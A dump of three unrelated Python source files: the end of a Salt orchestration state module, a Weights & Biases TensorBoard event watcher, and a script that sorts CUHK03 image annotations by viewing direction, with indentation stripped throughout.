m_state = False
else:
try:
m_ret = mdata['ret']
except KeyError:
m_state = False
if m_state:
m_state = __utils__['state.check_result'](m_ret, recurse=True)
if not m_state:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
continue
try:
for state_item in six.itervalues(m_ret):
if isinstance(state_item, dict):
if 'changes' in state_item and state_item['changes']:
changes[minion] = m_ret
break
else:
no_change.add(minion)
except AttributeError:
log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
no_change.add(minion)
if changes:
state_ret['changes'] = {'out': 'highstate', 'ret': changes}
if len(fail) > allow_fail:
state_ret['result'] = False
state_ret['comment'] = 'Run failed on minions: {0}'.format(', '.join(fail))
else:
state_ret['comment'] = 'States ran successfully.'
if changes:
state_ret['comment'] += ' Updating {0}.'.format(', '.join(changes))
if no_change:
state_ret['comment'] += ' No changes made to {0}.'.format(', '.join(no_change))
if test or __opts__.get('test'):
if state_ret['changes'] and state_ret['result'] is True:
# Test mode with changes is the only case where result should ever be none
state_ret['result'] = None
return state_ret
def function(
name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
expect_minions=False,
fail_minions=None,
fail_function=None,
arg=None,
kwarg=None,
timeout=None,
batch=None,
subset=None,
**kwargs): # pylint: disable=unused-argument
'''
Execute a single module function on a remote minion via salt or salt-ssh
name
The name of the function to run, aka cmd.run or pkg.install
tgt
The target specification, aka '*' for all minions
tgt_type
The target type, defaults to ``glob``
arg
The list of arguments to pass into the function
kwarg
The dict (not a list) of keyword arguments to pass into the function
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
fail_function
An optional string that points to a salt module that returns True or False
based on the returned data dict for individual minions
ssh
Set to `True` to use the ssh client instead of the standard salt client
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
'''
func_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
if kwarg is None:
kwarg = {}
if isinstance(arg, six.string_types):
func_ret['warnings'] = [
'Please specify \'arg\' as a list of arguments.'
]
arg = arg.split()
cmd_kw = {'arg': arg or [], 'kwarg': kwarg, 'ret': ret, 'timeout': timeout}
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
cmd_kw['expect_minions'] = expect_minions
cmd_kw['_cmd_meta'] = True
cmd_kw['asynchronous'] = kwargs.pop('asynchronous', False)
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
fun = name
if __opts__['test'] is True:
func_ret['comment'] = \
'Function {0} would be executed on target {1}'.format(fun, tgt)
func_ret['result'] = None
return func_ret
try:
_fire_args({'type': 'function', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
except Exception as exc:
func_ret['result'] = False
func_ret['comment'] = six.text_type(exc)
return func_ret
if cmd_kw['asynchronous']:
func_ret['__jid__'] = cmd_ret.get('jid')
func_ret['changes'] = cmd_ret
if int(cmd_ret.get('jid', 0)) > 0:
func_ret['result'] = True
func_ret['comment'] = 'Function submitted successfully.'
else:
func_ret['result'] = False
func_ret['comment'] = 'Function failed to run.'
return func_ret
try:
func_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
func_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
for minion, mdata in six.iteritems(cmd_ret):
m_ret = False
if mdata.get('retcode'):
func_ret['result'] = False
fail.add(minion)
if mdata.get('failed', False):
m_func = False
else:
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_ret = mdata['ret']
m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
if m_ret is False:
m_func = False
if not m_func:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
if not cmd_ret:
func_ret['result'] = False
func_ret['command'] = 'No minions responded'
else:
if changes:
func_ret['changes'] = {'out': 'highstate', 'ret': changes}
if fail:
func_ret['result'] = False
func_ret['comment'] = 'Running function {0} failed on minions: {1}'.format(name, ', '.join(fail))
else:
func_ret['comment'] = 'Function ran successfully.'
if changes:
func_ret['comment'] += ' Function {0} ran on {1}.'.format(name, ', '.join(changes))
return func_ret
def wait_for_event(
name,
id_list,
event_id='id',
timeout=300,
node='master'):
'''
Watch Salt's event bus and block until a condition is met
.. versionadded:: 2014.7.0
name
An event tag to watch for; supports Reactor-style globbing.
id_list
A list of event identifiers to watch for -- usually the minion ID. Each
time an event tag is matched the event data is inspected for
``event_id``, if found it is removed from ``id_list``. When ``id_list``
is empty this function returns success.
event_id : id
The name of a key in the event data. Default is ``id`` for the minion
ID, another common value is ``name`` for use with orchestrating
salt-cloud events.
timeout : 300
The maximum time in seconds to wait before failing.
The following example blocks until all the listed minions complete a
restart and reconnect to the Salt master:
.. code-block:: yaml
reboot_all_minions:
salt.function:
- name: system.reboot
- tgt: '*'
wait_for_reboots:
salt.wait_for_event:
- name: salt/minion/*/start
- id_list:
- jerry
- stuart
- dave
- phil
- kevin
- mike
- require:
- salt: reboot_all_minions
'''
ret = {'name': name, 'changes': {}, 'comment': '', 'result': False}
if __opts__.get('test'):
ret['comment'] = \
'Orchestration would wait for event \'{0}\''.format(name)
ret['result'] = None
return ret
sevent = salt.utils.event.get_event(
node,
__opts__['sock_dir'],
__opts__['transport'],
opts=__opts__,
listen=True)
del_counter = 0
starttime = time.time()
timelimit = starttime + timeout
while True:
event = sevent.get_event(full=True)
is_timedout = time.time() > timelimit
if event is None and not is_timedout:
log.trace("wait_for_event: No event data; waiting.")
continue
elif event is None and is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
if fnmatch.fnmatch(event['tag'], name):
val = event['data'].get(event_id)
if val is None and 'data' in event['data']:
val = event['data']['data'].get(event_id)
if val is not None:
try:
val_idx = id_list.index(val)
except ValueError:
log.trace("wait_for_event: Event identifier '%s' not in "
"id_list; skipping.", event_id)
else:
del id_list[val_idx]
del_counter += 1
minions_seen = ret['changes'].setdefault('minions_seen', [])
minions_seen.append(val)
log.debug("wait_for_event: Event identifier '%s' removed "
"from id_list; %s items remaining.",
val, len(id_list))
else:
log.trace("wait_for_event: Event identifier '%s' not in event "
"'%s'; skipping.", event_id, event['tag'])
else:
log.debug("wait_for_event: Skipping unmatched event '%s'",
event['tag'])
if not id_list:
ret['result'] = True
ret['comment'] = 'All events seen in {0} seconds.'.format(
time.time() - starttime)
return ret
if is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
def runner(name, **kwargs):
'''
Execute a runner module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the runner function
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
.. code-block:: yaml
run-manage-up:
salt.runner:
- name: manage.up
'''
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
ret = {
'name': name,
'result': None,
'changes': {},
'comment': "Runner function '{0}' would be executed.".format(name)
}
return ret
out = __salt__['saltutil.runner'](name,
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**kwargs)
if kwargs.get('asynchronous'):
out['return'] = out.copy()
out['success'] = 'jid' in out and 'tag' in out
runner_return = out.get('return')
if isinstance(runner_return, dict) and 'Error' in runner_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': runner_return},
'result': success}
ret['comment'] = "Runner function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
def parallel_runners(name, runners, **kwargs): # pylint: disable=unused-argument
'''
Executes multiple runner modules on the master in parallel.
.. versionadded:: 2017.x.0 (Nitrogen)
A separate thread is spawned for each runner. This state is intended to be
used with the orchestrate runner in place of the ``saltmod.runner`` state
when different tasks should be run in parallel. In general, Salt states are
not safe when used concurrently, so ensure that they are used in a safe way
(e.g. by only targeting separate minions in parallel tasks).
name:
name identifying this state. The name is provided as part of the
output, but not used for anything else.
runners:
list of runners that should be run in parallel. Each element of the
list has to be a dictionary. This dictionary's name entry stores the
name of the runner function that shall be invoked. The optional kwarg
entry stores a dictionary of named arguments that are passed to the
runner function.
.. code-block:: yaml
parallel-state:
salt.parallel_runners:
- runners:
my_runner_1:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_1
my_runner_2:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_2
'''
# For the sake of consistency, we treat a single string in the same way as
# a key without a value. This allows something like
# salt.parallel_runners:
# - runners:
# state.orchestrate
# Obviously, this will only work if the specified runner does not need any
# arguments.
if isinstance(runners, six.string_types):
runners = {runners: [{name: runners}]}
# If the runners argument is not a string, it must be a dict. Everything
# else is considered an error.
if not isinstance(runners, dict):
return {
'name': name,
'result': False,
'changes': {},
'comment': 'The runners parameter must be a string or dict.'
}
# The configuration for each runner is given as a list of key-value pairs.
# This is not very useful for what we want to do, but it is the typical
# style used in Salt. For further processing, we convert each of these
# lists to a dict. This also makes it easier to check whether a name has
# been specified explicitly.
for runner_id, runner_config in six.iteritems(runners):
if runner_config is None:
runner_config = {}
else:
runner_config = salt.utils.data.repack_dictlist(runner_config)
if 'name' not in runner_config:
runner_config['name'] = runner_id
runners[runner_id] = runner_config
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__')
jid = None
def call_runner(runner_config):
return __salt__['saltutil.runner'](runner_config['name'],
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**(runner_config.get('kwarg', {})))
try:
outputs = _parallel_map(call_runner, list(six.itervalues(runners)))
except salt.exceptions.SaltException as exc:
return {
'name': name,
'result': False,
'success': False,
'changes': {},
'comment': 'One of the runners raised an exception: {0}'.format(
exc)
}
# We bundle the results of the runners with the IDs of the runners so that
# we can easily identify which output belongs to which runner. At the same
# time we exctract the actual return value of the runner (saltutil.runner
# adds some extra information that is not interesting to us).
outputs = {
runner_id: out['return']for runner_id, out in
six.moves.zip(six.iterkeys(runners), outputs)
}
# If each of the runners returned its output in the format compatible with
# the 'highstate' outputter, we can leverage this fact when merging the
# outputs.
highstate_output = all(
[out.get('outputter', '') == 'highstate' and 'data' in out for out in
six.itervalues(outputs)]
)
# The following helper function is used to extract changes from highstate
# output.
def extract_changes(obj):
if not isinstance(obj, dict):
return {}
elif 'changes' in obj:
if (isinstance(obj['changes'], dict)
and obj['changes'].get('out', '') == 'highstate'
and 'ret' in obj['changes']):
return obj['changes']['ret']
else:
return obj['changes']
else:
found_changes = {}
for key, value in six.iteritems(obj):
change = extract_changes(value)
if change:
found_changes[key] = change
return found_changes
if highstate_output:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out['data'].get('retcode', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
runner_comments = [
'Runner {0} failed with return value:\n{1}'.format(
runner_id,
salt.output.out_format(outputs[runner_id],
'nested',
__opts__,
nested_indent=2)
) for runner_id in failed_runners
]
comment = '\n'.join(runner_comments)
changes = {}
for runner_id, out in six.iteritems(outputs):
runner_changes = extract_changes(out['data'])
if runner_changes:
changes[runner_id] = runner_changes
else:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out.get('exit_code', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
if len(failed_runners) == 1:
comment = 'Runner {0} failed.'.format(failed_runners[0])
else:
comment =\
'Runners {0} failed.'.format(', '.join(failed_runners))
changes = {'ret': {
runner_id: out for runner_id, out in six.iteritems(outputs)
}}
ret = {
'name': name,
'result': all_successful,
'changes': changes,
'comment': comment
}
# The 'runner' function includes out['jid'] as '__jid__' in the returned
# dict, but we cannot do this here because we have more than one JID if
# we have more than one runner.
return ret
def wheel(name, **kwargs):
'''
Execute a wheel module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the wheel function
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
.. code-block:: yaml
accept_minion_key:
salt.wheel:
- name: key.accept
- match: frank
'''
ret = {'name': name, 'result': False, 'changes': {}, 'comment': ''}
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
ret['result'] = None,
ret['changes'] = {}
ret['comment'] = "Wheel function '{0}' would be executed.".format(name)
return ret
out = __salt__['saltutil.wheel'](name,
__orchestration_jid__=jid,
__env__=__env__,
**kwargs)
if kwargs.get('asynchronous'):
ret['__jid__'] = ret.get('jid')
ret['changes'] = out
if int(out.get('jid', 0)) > 0:
ret['result'] = True
ret['comment'] = 'wheel submitted successfully.'
else:
ret['result'] = False
ret['comment'] = 'wheel failed to run.'
return ret
wheel_return = out.get('return')
if isinstance(wheel_return, dict) and 'Error' in wheel_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': wheel_return},
'result': success}
ret['comment'] = "Wheel function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
|
tb_watcher.py
|
"""
tensorboard watcher.
"""
import glob
import logging
import os
import queue
import socket
import sys
import threading
import time
from typing import Any, TYPE_CHECKING
import wandb
from wandb import util
from wandb.sdk.interface.interface import GlobStr
from wandb.viz import CustomChart
from . import run as internal_run
if TYPE_CHECKING:
from ..interface.interface_queue import InterfaceQueue
from .settings_static import SettingsStatic
from typing import Dict, List, Optional
from wandb.proto.wandb_internal_pb2 import RunRecord
from wandb.sdk.interface.interface import FilesDict
from queue import PriorityQueue
from tensorboard.compat.proto.event_pb2 import ProtoEvent
from tensorboard.backend.event_processing.event_file_loader import EventFileLoader
HistoryDict = Dict[str, Any]
# Give some time for tensorboard data to be flushed
SHUTDOWN_DELAY = 5
ERROR_DELAY = 5
REMOTE_FILE_TOKEN = "://"
logger = logging.getLogger(__name__)
def _link_and_save_file(
path: str, base_path: str, interface: "InterfaceQueue", settings: "SettingsStatic"
) -> None:
# TODO(jhr): should this logic be merged with Run.save()
files_dir = settings.files_dir
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(files_dir, file_name)
util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite existing symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
# TODO(jhr): need to figure out policy, live/throttled?
interface.publish_files(dict(files=[(GlobStr(glob.escape(file_name)), "live")]))
def is_tfevents_file_created_by(path: str, hostname: str, start_time: float) -> bool:
"""Checks if a path is a tfevents file created by hostname.
tensorboard tfevents filename format:
https://github.com/tensorflow/tensorboard/blob/f3f26b46981da5bd46a5bb93fcf02d9eb7608bc1/tensorboard/summary/writer/event_file_writer.py#L81
tensorflow tfevents fielname format:
https://github.com/tensorflow/tensorflow/blob/8f597046dc30c14b5413813d02c0e0aed399c177/tensorflow/core/util/events_writer.cc#L68
"""
if not path:
raise ValueError("Path must be a nonempty string")
basename = os.path.basename(path)
if basename.endswith(".profile-empty") or basename.endswith(".sagemaker-uploaded"):
return False
fname_components = basename.split(".")
try:
tfevents_idx = fname_components.index("tfevents")
except ValueError:
return False
# check the hostname, which may have dots
for i, part in enumerate(hostname.split(".")):
try:
fname_component_part = fname_components[tfevents_idx + 2 + i]
except IndexError:
return False
if part != fname_component_part:
return False
try:
created_time = int(fname_components[tfevents_idx + 1])
except (ValueError, IndexError):
return False
# Ensure that the file is newer then our start time, and that it was
# created from the same hostname.
# TODO: we should also check the PID (also contained in the tfevents
# filename). Can we assume that our parent pid is the user process
# that wrote these files?
return created_time >= int(start_time) # noqa: W503
class TBWatcher:
_logdirs: "Dict[str, TBDirWatcher]"
_watcher_queue: "PriorityQueue"
def __init__(
self,
settings: "SettingsStatic",
run_proto: "RunRecord",
interface: "InterfaceQueue",
force: bool = False,
) -> None:
self._logdirs = {}
self._consumer: Optional[TBEventConsumer] = None
self._settings = settings
self._interface = interface
self._run_proto = run_proto
self._force = force
# TODO(jhr): do we need locking in this queue?
self._watcher_queue = queue.PriorityQueue()
wandb.tensorboard.reset_state()
def _calculate_namespace(self, logdir: str, rootdir: str) -> "Optional[str]":
namespace: "Optional[str]"
dirs = list(self._logdirs) + [logdir]
if os.path.isfile(logdir):
filename = os.path.basename(logdir)
else:
filename = ""
if rootdir == "":
rootdir = util.to_forward_slash_path(
os.path.dirname(os.path.commonprefix(dirs))
)
# Tensorboard loads all tfevents files in a directory and prepends
# their values with the path. Passing namespace to log allows us
# to nest the values in wandb
# Note that we strip '/' instead of os.sep, because elsewhere we've
# converted paths to forward slash.
namespace = logdir.replace(filename, "").replace(rootdir, "").strip("/")
# TODO: revisit this heuristic, it exists because we don't know the
# root log directory until more than one tfevents file is written to
if len(dirs) == 1 and namespace not in ["train", "validation"]:
namespace = None
else:
namespace = logdir.replace(filename, "").replace(rootdir, "").strip("/")
return namespace
def add(self, logdir: str, save: bool, root_dir: str) -> None:
logdir = util.to_forward_slash_path(logdir)
root_dir = util.to_forward_slash_path(root_dir)
if logdir in self._logdirs:
return
namespace = self._calculate_namespace(logdir, root_dir)
# TODO(jhr): implement the deferred tbdirwatcher to find namespace
if not self._consumer:
self._consumer = TBEventConsumer(
self, self._watcher_queue, self._run_proto, self._settings
)
self._consumer.start()
tbdir_watcher = TBDirWatcher(
self, logdir, save, namespace, self._watcher_queue, self._force
)
self._logdirs[logdir] = tbdir_watcher
tbdir_watcher.start()
def finish(self) -> None:
for tbdirwatcher in self._logdirs.values():
tbdirwatcher.shutdown()
for tbdirwatcher in self._logdirs.values():
tbdirwatcher.finish()
if self._consumer:
self._consumer.finish()
class TBDirWatcher:
def __init__(
self,
tbwatcher: "TBWatcher",
logdir: str,
save: bool,
namespace: "Optional[str]",
queue: "PriorityQueue",
force: bool = False,
) -> None:
self.directory_watcher = util.get_module(
"tensorboard.backend.event_processing.directory_watcher",
required="Please install tensorboard package",
)
# self.event_file_loader = util.get_module(
# "tensorboard.backend.event_processing.event_file_loader",
# required="Please install tensorboard package",
# )
self.tf_compat = util.get_module(
"tensorboard.compat", required="Please install tensorboard package"
)
self._tbwatcher = tbwatcher
self._generator = self.directory_watcher.DirectoryWatcher(
logdir, self._loader(save, namespace), self._is_our_tfevents_file
)
self._thread = threading.Thread(target=self._thread_except_body)
self._first_event_timestamp = None
self._shutdown = threading.Event()
self._queue = queue
self._file_version = None
self._namespace = namespace
self._logdir = logdir
self._hostname = socket.gethostname()
self._force = force
def start(self) -> None:
self._thread.start()
def _is_our_tfevents_file(self, path: str) -> bool:
"""Checks if a path has been modified since launch and contains tfevents"""
if not path:
raise ValueError("Path must be a nonempty string")
if self._force:
return True
path = self.tf_compat.tf.compat.as_str_any(path)
return is_tfevents_file_created_by(
path, self._hostname, self._tbwatcher._settings._start_time
)
def _loader(self, save: bool = True, namespace: str = None) -> "EventFileLoader":
"""Incredibly hacky class generator to optionally save / prefix tfevent files"""
_loader_interface = self._tbwatcher._interface
_loader_settings = self._tbwatcher._settings
try:
from tensorboard.backend.event_processing import event_file_loader
except ImportError:
raise Exception("Please install tensorboard package")
class EventFileLoader(event_file_loader.EventFileLoader):
def __init__(self, file_path: str) -> None:
super().__init__(file_path)
if save:
if REMOTE_FILE_TOKEN in file_path:
logger.warning(
"Not persisting remote tfevent file: %s", file_path
)
else:
# TODO: save plugins?
logdir = os.path.dirname(file_path)
parts = list(os.path.split(logdir))
if namespace and parts[-1] == namespace:
parts.pop()
logdir = os.path.join(*parts)
_link_and_save_file(
path=file_path,
base_path=logdir,
interface=_loader_interface,
settings=_loader_settings,
)
return EventFileLoader
def _process_events(self, shutdown_call: bool = False) -> None:
try:
for event in self._generator.Load():
self.process_event(event)
except (
self.directory_watcher.DirectoryDeletedError,
StopIteration,
RuntimeError,
OSError,
) as e:
# When listing s3 the directory may not yet exist, or could be empty
logger.debug("Encountered tensorboard directory watcher error: %s", e)
if not self._shutdown.is_set() and not shutdown_call:
time.sleep(ERROR_DELAY)
def _thread_except_body(self) -> None:
try:
self._thread_body()
except Exception as e:
logger.exception("generic exception in TBDirWatcher thread")
raise e
def _thread_body(self) -> None:
"""Check for new events every second"""
shutdown_time: "Optional[float]" = None
while True:
self._process_events()
if self._shutdown.is_set():
now = time.time()
if not shutdown_time:
shutdown_time = now + SHUTDOWN_DELAY
elif now > shutdown_time:
break
time.sleep(1)
def process_event(self, event: "ProtoEvent") -> None:
# print("\nEVENT:::", self._logdir, self._namespace, event, "\n")
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField("file_version"):
self._file_version = event.file_version
if event.HasField("summary"):
self._queue.put(Event(event, self._namespace))
def shutdown(self) -> None:
self._process_events(shutdown_call=True)
self._shutdown.set()
def finish(self) -> None:
self.shutdown()
self._thread.join()
class Event:
"""An event wrapper to enable priority queueing"""
def __init__(self, event: "ProtoEvent", namespace: "Optional[str]"):
self.event = event
self.namespace = namespace
self.created_at = time.time()
def __lt__(self, other: "Event") -> bool:
if self.event.wall_time < other.event.wall_time:
return True
return False
class TBEventConsumer:
"""Consumes tfevents from a priority queue. There should always
only be one of these per run_manager. We wait for 10 seconds of queued
events to reduce the chance of multiple tfevent files triggering
out of order steps.
"""
def __init__(
self,
tbwatcher: TBWatcher,
queue: "PriorityQueue",
run_proto: "RunRecord",
settings: "SettingsStatic",
delay: int = 10,
) -> None:
self._tbwatcher = tbwatcher
self._queue = queue
self._thread = threading.Thread(target=self._thread_except_body)
self._shutdown = threading.Event()
self.tb_history = TBHistory()
self._delay = delay
# This is a bit of a hack to get file saving to work as it does in the user
# process. Since we don't have a real run object, we have to define the
# datatypes callback ourselves.
def datatypes_cb(fname: GlobStr) -> None:
files: "FilesDict" = dict(files=[(fname, "now")])
self._tbwatcher._interface.publish_files(files)
# this is only used for logging artifacts
self._internal_run = internal_run.InternalRun(run_proto, settings, datatypes_cb)
self._internal_run._set_internal_run_interface(self._tbwatcher._interface)
def start(self) -> None:
self._start_time = time.time()
self._thread.start()
def finish(self) -> None:
self._delay = 0
self._shutdown.set()
try:
event = self._queue.get(True, 1)
except queue.Empty:
event = None
if event:
self._handle_event(event, history=self.tb_history)
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(
item,
)
self._thread.join()
def _thread_except_body(self) -> None:
try:
self._thread_body()
except Exception as e:
logger.exception("generic exception in TBEventConsumer thread")
raise e
def _thread_body(self) -> None:
while True:
try:
event = self._queue.get(True, 1)
# Wait self._delay seconds from consumer start before logging events
if (
time.time() < self._start_time + self._delay
and not self._shutdown.is_set()
):
self._queue.put(event)
time.sleep(0.1)
continue
except queue.Empty:
event = None
if self._shutdown.is_set():
break
if event:
self._handle_event(event, history=self.tb_history)
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(
item,
)
# flush uncommitted data
self.tb_history._flush()
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(item)
def _handle_event(self, event: "ProtoEvent", history: "TBHistory" = None) -> None:
wandb.tensorboard._log(
event.event,
step=event.event.step,
namespace=event.namespace,
history=history,
)
def _save_row(self, row: "HistoryDict") -> None:
chart_keys = set()
for k in row:
if isinstance(row[k], CustomChart):
chart_keys.add(k)
key = row[k].get_config_key(k)
value = row[k].get_config_value(
"Vega2", row[k].user_query(f"{k}_table")
)
row[k] = row[k]._data
self._tbwatcher._interface.publish_config(val=value, key=key)
for k in chart_keys:
row[f"{k}_table"] = row.pop(k)
self._tbwatcher._interface.publish_history(
row, run=self._internal_run, publish_step=False
)
class TBHistory:
_data: "HistoryDict"
_added: "List[HistoryDict]"
def __init__(self) -> None:
self._step = 0
self._step_size = 0
self._data = dict()
self._added = []
def _flush(self) -> None:
if not self._data:
return
# A single tensorboard step may have too much data
# we just drop the largest keys in the step if it does.
# TODO: we could flush the data across multiple steps
if self._step_size > util.MAX_LINE_BYTES:
metrics = [(k, sys.getsizeof(v)) for k, v in self._data.items()]
metrics.sort(key=lambda t: t[1], reverse=True)
bad = 0
dropped_keys = []
for k, v in metrics:
# TODO: (cvp) Added a buffer of 100KiB, this feels rather brittle.
if self._step_size - bad < util.MAX_LINE_BYTES - 100000:
break
else:
bad += v
dropped_keys.append(k)
del self._data[k]
wandb.termwarn(
"Step {} exceeds max data limit, dropping {} of the largest keys:".format(
self._step, len(dropped_keys)
)
)
print("\t" + ("\n\t".join(dropped_keys)))
self._data["_step"] = self._step
self._added.append(self._data)
self._step += 1
self._step_size = 0
def add(self, d: "HistoryDict") -> None:
self._flush()
self._data = dict()
self._data.update(self._track_history_dict(d))
def _track_history_dict(self, d: "HistoryDict") -> "HistoryDict":
e = {}
for k in d.keys():
e[k] = d[k]
self._step_size += sys.getsizeof(e[k])
return e
def _row_update(self, d: "HistoryDict") -> None:
self._data.update(self._track_history_dict(d))
def _get_and_reset(self) -> "List[HistoryDict]":
added = self._added[:]
self._added = []
return added
|
get_label_from_xml.py
|
# coding=utf-8
import xml.etree.ElementTree as ET
import sys
import os
import glob
import shutil
import cv2
from multiprocessing import Pool
from multiprocessing import Manager
from multiprocessing import Process
import numpy as np
import pickle
def restore_file(path):
df = open(path, 'rb')
file = pickle.load(df)
df.close()
return file
def save_file(file, path, protocol=None):
df = open(path, 'wb')
if protocol is None:
pickle.dump(file, df)
else:
pickle.dump(file, df, protocol=protocol)
df.close()
print('Successfully save ', path)
def get_direction(xml_path):
tree = ET.parse(xml_path)
rect={}
line=""
root = tree.getroot()
#for name in root.iter('path'):
# rect['path'] = os.path.basename(name.text)
def get_info(ob, name):
for front in ob.iter(name):
return int(front.text)
for ob in root.iter('attributes'):
rect['front'] = get_info(ob, 'front')
rect['back'] = get_info(ob, 'back')
rect['side'] = get_info(ob, 'side')
rect['front_side'] = get_info(ob, 'front_side')
rect['back_side'] = get_info(ob, 'back_side')
rect['noise'] = get_info(ob, 'noise')
try:
sums = sum(rect.values())
except:
sums = 0
return rect, sums
def mkdirs(root_dir):
if os.path.exists(root_dir) is False:
os.mkdir(root_dir)
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise', 'null', 'error']
for i in direction_list:
if os.path.exists(root_dir+i) is False:
os.mkdir(root_dir+i)
def get_copy_list():
save_dir = 'cuhk03_train_fixed2/'
mkdirs(save_dir)
xml_list = glob.glob('cuhk03_annotations/*.xml')
copy_list = []
print('len(xml_list):', len(xml_list))
key_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise']
num_dict = {}
for i in key_list:
num_dict[i] = 0
for index, path in enumerate(xml_list):
if index % 5000 == 0:
print(index, len(xml_list))
rect, sums = get_direction(path)
if sums == 0:
#shutil.copyfile(path, save_dir+'null/'+os.path.basename(path))
copy_list.append([path, save_dir+'null/'+os.path.basename(path)])
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+'null/'+os.path.basename(path1))
copy_list.append([path1, save_dir+'null/'+os.path.basename(path1)])
continue
if sums > 1:
#shutil.copyfile(path, save_dir+'error/'+os.path.basename(path))
copy_list.append([path, save_dir+'error/'+os.path.basename(path)])
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+'error/'+os.path.basename(path1))
copy_list.append([path1, save_dir+'error/'+os.path.basename(path1)])
continue
for key in rect.keys():
if rect[key] == 1:
num_dict[key] += 1
path1 = path.replace('.xml', '.jpg')
#shutil.copyfile(path1, save_dir+key+'/'+os.path.basename(path1))
copy_list.append([path1, save_dir+key+'/'+os.path.basename(path1)])
break
print('-------------')
for i in key_list:
print(i, num_dict[i], round(num_dict[i]/len(xml_list), 3))
print('-------------')
print(round((num_dict['front']+num_dict['front_side'])/len(xml_list), 3))
print(round((num_dict['back']+num_dict['back_side'])/len(xml_list), 3))
print(round((num_dict['side'])/len(xml_list), 3))
return copy_list
def copy_img(path_list):
for path in path_list:
shutil.copyfile(path[0], path[1])
def split_direction():
copy_list = get_copy_list()
print('len(copy_list):', len(copy_list))
#exit(0)
num_jobs = 8
index_list = len(copy_list)*np.arange(0,1,1/num_jobs)
index_list = [int(i) for i in index_list]
index_list.append(len(copy_list))
print(index_list)
processes = list()
for i in range(num_jobs):
p = Process(target=copy_img, args=(copy_list[index_list[i]:index_list[i+1]],))
print('Process %d will start.' % i)
p.start()
processes.append(p)
for p in processes:
p.join()
def get_bbox(xml_path):
tree = ET.parse(xml_path)
rect={}
line=""
root = tree.getroot()
#for name in root.iter('path'):
# rect['path'] = os.path.basename(name.text)
def get_info(ob, name):
for front in ob.iter(name):
return int(front.text)
for ob in root.iter('bndbox'):
#for obb in root.iter('bndbox'):
xmin = get_info(ob, 'xmin')
ymin = get_info(ob, 'ymin')
xmax = get_info(ob, 'xmax')
ymax = get_info(ob, 'ymax')
break
print(xmin, xmax, ymin, ymax)
return xmin, xmax, ymin, ymax
if __name__ == '__main__':
'''
name = 'wait_to_crop_train/0010_c6s4_002427_07.jpg'
